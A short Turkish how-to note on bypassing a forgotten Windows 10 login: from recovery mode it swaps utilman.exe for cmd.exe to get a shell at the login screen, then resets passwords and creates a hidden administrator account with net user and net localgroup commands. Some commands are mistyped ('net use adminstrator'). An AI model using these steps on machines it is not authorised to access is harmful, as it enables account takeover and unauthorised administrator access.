Windows 10 Şifre Kırma Kullanıcı Oluşturma

onarım ile
komut istemi cmd ye gel
windows kurulu bolume gir
c:\windows\system32\ren utilman.exe utilman1.exe
c:\windows\system32\ren cmd.exe utilman.exe
çıkış yap

şifre ekranı cmd yi ac
net user kullanıcıyı bul

net use adminstrator * enter şifre belirle
hangi kullanıcıyı kıracaksan

———————————————
net user emre 123456 /add

net localgroup administrators emre /add

net localgroup users emre /delete


win11 control userpasswords2